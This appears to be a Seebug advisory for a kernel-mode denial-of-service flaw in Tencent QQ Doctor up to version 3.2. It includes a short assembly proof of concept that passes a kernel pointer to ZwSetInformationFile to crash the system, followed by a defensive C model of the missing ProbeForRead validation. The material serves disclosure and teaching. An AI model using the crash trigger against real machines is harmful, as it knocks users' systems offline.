Tencent QQ Doctor <= 3.2 ZwSetInformationFile Filter Kernel Mode D.O.S Vulnerability

2010-02-19T00:00:00
ID SSV:19129
Type seebug
Reporter Root
Modified 2010-02-19T00:00:00

Description

The Tencent QQ Doctor kernel-mode driver filters ZwSetInformationFile and, for FileDispositionInformation requests, uses the caller-supplied FileInformation pointer directly without validating the memory it points to.

Affected versions: 1.0~3.2. Uninstall QQ Doctor.

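	HMODULE hlib = GetModuleHandle("ntdll.dll");
	PVOID pZwSetInformationFile = GetProcAddress(hlib, "ZwSetInformationFile");

	// stdcall: arguments are pushed right to left
	__asm
	{
		push 0xd          // FileInformationClass = FileDispositionInformation
		push 0            // Length
		push 0x80000000   // FileInformation
		push 0            // IoStatusBlock
		push 0            // FileHandle
		call pZwSetInformationFile
	}

	return 0;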
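
The validation the description says is missing can be modelled in portable C. This is an added example, not code from the advisory or from the QQ Doctor driver: it models the range check of ProbeForRead for a 32-bit user address space and compares probing with the caller's Length against probing the size the filter actually reads. The function names, the 0x7FFF0000 limit and the sample user address are assumptions for illustration.

```c
#include <stdint.h>
#include <stdio.h>

/* NTSTATUS values from ntstatus.h */
#define STATUS_SUCCESS              0x00000000u
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004u
#define STATUS_ACCESS_VIOLATION     0xC0000005u

#define FILE_DISPOSITION_CLASS 13u         /* 0xd, the class pushed in the PoC */
#define DISPOSITION_INFO_SIZE  1u          /* one BOOLEAN (DeleteFile) */
#define USER_PROBE_LIMIT       0x7FFF0000u /* assumed 32-bit x86 user-space limit */

/* Simplified model of ProbeForRead's range check; zero length probes nothing. */
static uint32_t probe_for_read(uint32_t addr, uint32_t len)
{
    uint32_t end = addr + len;             /* unsigned add, may wrap */
    if (len == 0)
        return STATUS_SUCCESS;
    if (end < addr || end > USER_PROBE_LIMIT)
        return STATUS_ACCESS_VIOLATION;
    return STATUS_SUCCESS;
}

/* Insufficient: trusts the caller's Length, so Length == 0 skips the probe. */
uint32_t check_caller_length(uint32_t info, uint32_t length, uint32_t info_class)
{
    if (info_class != FILE_DISPOSITION_CLASS)
        return STATUS_SUCCESS;             /* assumed: other classes pass through */
    return probe_for_read(info, length);
}

/* Hardened: reject short buffers, then probe the bytes the filter will read. */
uint32_t check_fixed_size(uint32_t info, uint32_t length, uint32_t info_class)
{
    if (info_class != FILE_DISPOSITION_CLASS)
        return STATUS_SUCCESS;
    if (length < DISPOSITION_INFO_SIZE)
        return STATUS_INFO_LENGTH_MISMATCH;
    return probe_for_read(info, DISPOSITION_INFO_SIZE);
}

int main(void)
{
    /* Arguments taken from the PoC: FileInformation 0x80000000, Length 0, class 0xd */
    printf("caller length: 0x%08X\n", (unsigned)check_caller_length(0x80000000u, 0, 0xd));
    printf("fixed size:    0x%08X\n", (unsigned)check_fixed_size(0x80000000u, 0, 0xd));
    printf("kernel ptr:    0x%08X\n", (unsigned)check_fixed_size(0x80000000u, 1, 0xd));
    printf("user ptr:      0x%08X\n", (unsigned)check_fixed_size(0x00401000u, 1, 0xd)); /* constructed */
    return 0;
}
```

In a real driver the read that follows the probe also belongs inside `__try`/`__except`, with the value copied to a local before use, because a user page can become invalid after it has been probed.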